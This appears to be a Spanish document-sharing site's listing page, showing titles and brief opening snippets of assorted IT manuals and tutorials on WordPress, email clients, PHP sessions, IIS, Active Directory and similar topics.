GUÍA PARA LA INSTALACIÓN Y USO DE WORDPRESS BY MASTERHACKS. www.masterhacks.net. Guía de instalación y uso de Wordpress Página 1

GUÍA PARA LA INSTALACIÓN Y USO DE WORDPRESS BY MASTERHACKS. www.masterhacks.net. Guía de instalación y uso de Wordpress Página 1 GUÍA PARA LA INSTALACIÓN Y USO DE WORDPRESS BY MASTERHACKS www.masterhacks.net Guía de instalación y uso de Wordpress Página 1 Wordpress es un sistema muy utilizado para la creación de blogs. Este se puede

Más detalles

Mi correo con OUTLOOK

Mi correo con OUTLOOK Mi correo con OUTLOOK En este manual vamos a ver los pasos necesarios para configurar nuestra cuenta de correo. En primer lugar, ejecutaremos nuestro cliente outlook. Si es la primera vez que ejecutamos

Más detalles

CREACIÓN O MIGRACIÓN DEL CORREO POP A IMAP PARA MOZILLA THUNDERBIRD

CREACIÓN O MIGRACIÓN DEL CORREO POP A IMAP PARA MOZILLA THUNDERBIRD CREACIÓN O MIGRACIÓN DEL CORREO POP A IMAP PARA MOZILLA THUNDERBIRD Realización de copia de seguridad del correo actual... 2 Creación y configuración de la cuenta IMAP... 6 Migración de carpetas de POP

Más detalles

APÉNDICE E: MANUAL DE USUARIO PARA EL SISTEMA DE MONITOREO DE REDES LAN.

APÉNDICE E: MANUAL DE USUARIO PARA EL SISTEMA DE MONITOREO DE REDES LAN. APÉNDICE E: MANUAL DE USUARIO PARA EL SISTEMA DE MONITOREO DE REDES LAN. Objetivo: Mostrar al usuario administrador el funcionamiento del sistema, junto con los datos que debe ingresar, además de interactuar

Más detalles

Este tipo de situaciones son solventadas a partir de las variables de sesión.

Este tipo de situaciones son solventadas a partir de las variables de sesión. INDICE 1.- Concepto de Sesión 2.- Variables de Sesión 3.- Iniciando sesiones 4.- Creando variables de sesión 1.- Concepto de Sesión En los programas que hemos visto hasta ahora, hemos utilizado variables

Más detalles

MANUAL DE USO DE LA APLICACIÓN

MANUAL DE USO DE LA APLICACIÓN MANUAL DE USO DE LA APLICACIÓN ÍNDICE 1. Acceso a la aplicación 2. Definición de funciones 3. Plantillas 4. Cómo crear una nueva encuesta 5. Cómo enviar una encuesta 6. Cómo copiar una encuesta 7. Cómo

Más detalles

Manual de uso del convenio de Microsoft MSDN Academic Alliance

Manual de uso del convenio de Microsoft MSDN Academic Alliance Manual de uso del convenio de Microsoft MSDN Academic Alliance Contenido Manual de Uso del Convenio MSDN AA... 2 Activación de la cuenta de usuario válido.... 2 Ingreso a la plataforma... 3 Selección de

Más detalles

Construcción de una aplicación web para crear un sistema de encuestas con la tecnología PHP y la base de datos MySQL.

Construcción de una aplicación web para crear un sistema de encuestas con la tecnología PHP y la base de datos MySQL. Sistema de encuestas PHP y MySQL Construcción de una aplicación web para crear un sistema de encuestas con la tecnología PHP y la base de datos MySQL. Sistema de encuestas. Base de datos a utilizar Algunas

Más detalles

Internet Information Server

Internet Information Server Internet Information Server Internet Information Server (IIS) es el servidor de páginas web avanzado de la plataforma Windows. Se distribuye gratuitamente junto con las versiones de Windows basadas en

Más detalles

Jornadas de INCLUSION DIGITAL. a través de las TIC ORGANIZAN: CAPACITA: CLAEH

Jornadas de INCLUSION DIGITAL. a través de las TIC ORGANIZAN: CAPACITA: CLAEH Jornadas de INCLUSION DIGITAL a través de las TIC ORGANIZAN: CAPACITA: CLAEH PRINCIPIOS DE LA NAVEGACIÓN EN INTERNET QUÉ ES EL EXPLORADOR WEB? El explorador Web es la herramienta creada para el uso y explotación

Más detalles

Loewe Preguntas frecuentes 22.09.2009 Página 1. Loewe Support Portal. Preguntas frecuentes.

Loewe Preguntas frecuentes 22.09.2009 Página 1. Loewe Support Portal. Preguntas frecuentes. Página 1 Loewe Support Portal.. Página 2 Loewe Support Portal.. Por qué no puedo iniciar sesión con mi dirección de correo electrónico y mi contraseña? Debe hacer clic en el enlace de confirmación de su

Más detalles

PREPARAR E IMPRIMIR DOCUMENTOS

PREPARAR E IMPRIMIR DOCUMENTOS PREPARAR E IMPRIMIR DOCUMENTOS Preparar documentos Cuando trabajamos en internet, es probable que mucha de la información que encontramos útil, la necesitemos guardar en nuestro computador, ya sea en el

Más detalles

INTRODUCCIÓN A LA PROGRAMACIÓN WEB UNIDAD. Estructura de contenidos: http://www.ucv.edu.pe/cis/ cisvirtual@ucv.edu.pe. 1.

INTRODUCCIÓN A LA PROGRAMACIÓN WEB UNIDAD. Estructura de contenidos: http://www.ucv.edu.pe/cis/ cisvirtual@ucv.edu.pe. 1. INTRODUCCIÓN A LA PROGRAMACIÓN WEB UNIDAD 1 Estructura de contenidos: 1. Programación Web 2. Sistema De Información 3. Sistema Web 4. Requisitos Para Sistemas Web Con Asp 5. Internet Information Server

Más detalles

Cómo publicar el contenido del servidor All-In-One (AIO) a través de WMS o mediante el reproductor nativo

Cómo publicar el contenido del servidor All-In-One (AIO) a través de WMS o mediante el reproductor nativo Cómo publicar el contenido del servidor All-In-One (AIO) a través de WMS o mediante el reproductor nativo ImaginArt 2010 Página 1 de 11 1. Publicar el Live Streaming (Windows Media Server - WMS) Esquema

Más detalles

Solución al Primer Reto

Solución al Primer Reto En el reto que se planteaba en el primer articulo se pedía conseguir toda la información posible sobre la maquina virtual que se suministra y a través de dicha información descubrir vulnerabilidades e

Más detalles

Instructivo antivirus y antispam Barracuda

Instructivo antivirus y antispam Barracuda Instructivo antivirus y antispam Barracuda Barracuda El antivirus y antispam Barracuda es un sistema que automáticamente revisa todo el correo electrónico que entra con destino a su dirección de correo,

Más detalles

PROGRAMA FORMATIVO MICROSOFT ACCESS 2007 (COMPLETO)

PROGRAMA FORMATIVO MICROSOFT ACCESS 2007 (COMPLETO) PROGRAMA FORMATIVO MICROSOFT ACCESS 2007 (COMPLETO) www.bmformacion.es info@bmformacion.es Objetivos Descripción del funcionamiento del programa de gestión de bases de datos Microsoft Access 2007, estudiando

Más detalles

WINDOWS 2008 5: TERMINAL SERVER

WINDOWS 2008 5: TERMINAL SERVER WINDOWS 2008 5: TERMINAL SERVER 1.- INTRODUCCION: Terminal Server proporciona una interfaz de usuario gráfica de Windows a equipos remotos a través de conexiones en una red local o a través de Internet.

Más detalles

Manual de Usuario - SDI - Seguridad en Datos de Investigación. Automatización de Buenas Prácticas en Bases de Datos de Investigación

Manual de Usuario - SDI - Seguridad en Datos de Investigación. Automatización de Buenas Prácticas en Bases de Datos de Investigación Manual de Usuario - SDI - Seguridad en Datos de Investigación Automatización de Buenas Prácticas en Bases de Datos de Investigación 2010 - UCICEC Hospital de Cruces Versión: 1.0 Fecha: 31/03/2010 ÍNDICE

Más detalles

CÓMO ADMINISTRAR TU SITIO WEB Y PUBLICAR

CÓMO ADMINISTRAR TU SITIO WEB Y PUBLICAR CÓMO ADMINISTRAR TU SITIO WEB Y PUBLICAR ÍNDICE: 0) Cómo crear un sitio. 1) Cómo acceder a la administración de mi sitio. 2) Cómo acceder a la administración de mi sitio. 3) Cómo escribir en mi sitio.

Más detalles

MANUAL DE USUARIO INTRANET

MANUAL DE USUARIO INTRANET MANUAL DE USUARIO INTRANET Partes de la Intranet. La intranet se divide en varias partes claramente diferenciadas, que facilitan la navegación a través de la misma. A) Cabecera Es la parte estática de

Más detalles

REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS

REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS Active Directory - 1 - Active Directory...- 3 - Definición... - 3 - Promoción a Controlador de Dominio... - 4 - - 2 - Active Directory Definición

Más detalles

Desinstalar e instalar nuevamente su programa conservando los datos.

Desinstalar e instalar nuevamente su programa conservando los datos. Suele ocurrir con mucha frecuencia que inicialmente el usuario instala y registra el programa en un ordenador, y con el paso del tiempo ese mismo ordenador se vuelve lento y obsoleto con lo cual el usuario

Más detalles

Sitios remotos. Configurar un Sitio Remoto

Sitios remotos. Configurar un Sitio Remoto Sitios remotos Definir un sitio remoto significa establecer una configuración de modo que Dreamweaver sea capaz de comunicarse directamente con un servidor en Internet (por eso se llama remoto) y así poder

Más detalles

Manual de uso de la plataforma para monitores. CENTRO DE APOYO TECNOLÓGICO A EMPRENDEDORES -bilib

Manual de uso de la plataforma para monitores. CENTRO DE APOYO TECNOLÓGICO A EMPRENDEDORES -bilib Manual de uso de la plataforma para monitores CENTRO DE APOYO TECNOLÓGICO A EMPRENDEDORES -bilib [Manual de uso de la plataforma para monitores] 1. Licencia Autor del documento: Centro de Apoyo Tecnológico

Más detalles

El sistema está solicitandome ingresar nuevamente porque mi sesión ha expirado. Qué significa esto?

El sistema está solicitandome ingresar nuevamente porque mi sesión ha expirado. Qué significa esto? Qué tipos de navegadores son compatibles? Necesito habilitar cookies? Qué son sesiones de cookies? El sistema está solicitandome ingresar nuevamente porque mi sesión ha expirado. Qué significa esto? Estoy

Más detalles

MANUAL DE USUARIO CMS- PLONE www.trabajo.gob.hn

MANUAL DE USUARIO CMS- PLONE www.trabajo.gob.hn MANUAL DE USUARIO CMS- PLONE www.trabajo.gob.hn Tegucigalpa M. D. C., Junio de 2009 Que es un CMS Un sistema de administración de contenido (CMS por sus siglas en ingles) es un programa para organizar

Más detalles

Manual de usuario para Facturación Electrónica 2011

Manual de usuario para Facturación Electrónica 2011 Contenido Manual de usuario Facturación Electrónica.... 2 Requisitos... 2 Registro de usuario.... 2 Inicio de sesión.... 4 Cerrar Sesión.... 4 Mi cuenta.... 5 Datos Personales.... 5 Información Fiscal...

Más detalles

SISTEMA DE TRANSMISIÓN DE FICHEROS Usuarios Responsables de Centro Lácteo LETRA Q TRAZABILIDAD

SISTEMA DE TRANSMISIÓN DE FICHEROS Usuarios Responsables de Centro Lácteo LETRA Q TRAZABILIDAD SISTEMA DE TRANSMISIÓN DE FICHEROS Usuarios Responsables de Centro Lácteo LETRA Q TRAZABILIDAD Marzo 2009 Carga de Ficheros de Movimientos Se podrá acceder al nuevo sistema de transmisión de ficheros a

Más detalles

Dirección de Sistemas de Información Departamento CERES

Dirección de Sistemas de Información Departamento CERES 1. Solicitud del certificado 2. Acreditación de la identidad mediante personación física en una oficina de registro. 3. Descarga del certificado desde Internet. Para realizar estos tres pasos, primeramente

Más detalles